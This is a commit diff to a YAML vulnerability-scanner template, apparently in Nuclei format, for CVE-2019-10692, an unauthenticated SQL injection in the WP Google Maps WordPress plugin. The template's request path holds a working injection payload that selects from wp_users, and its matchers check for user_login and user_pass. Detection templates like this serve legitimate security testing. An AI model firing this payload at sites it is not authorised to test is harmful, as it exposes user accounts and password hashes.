Update CVE-2019-10692.yaml

2022-08-08 19:08:44 +05:30 · 2022-08-08 19:08:44 +05:30 · 3964e22f69
parent 383ed21913
commit 3964e22f69
1 changed files with 19 additions and 8 deletions
--- a/vulnerabilities/wordpress/CVE-2019-10692.yaml
+++ b/vulnerabilities/wordpress/CVE-2019-10692.yaml
@ -1,21 +1,22 @@
 id: CVE-2019-10692

 info:
-  name: CVE-2019-10692
+  name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection
  author: pussycat0x
  severity: critical
-  description: In the wp-google-maps plugin before 7.11.18 for WordPress,
+  description: |
+    In the wp-google-maps plugin before 7.11.18 for WordPress,
    includes/class.rest-api.php in the REST API does not sanitize field names
    before a SELECT statement.
-  reference: https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea
-  tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth
-  
+  reference: 
+    - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-10692
+  tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20\
-        from%20wp_users--%20-"
+      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"

    matchers-condition: and
    matchers:
@ -24,4 +25,14 @@ requests:
        words:
          - '"user_login"'
          - '"user_pass"'
-          - '"user_nicename"'
+          - '"user_nicename"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200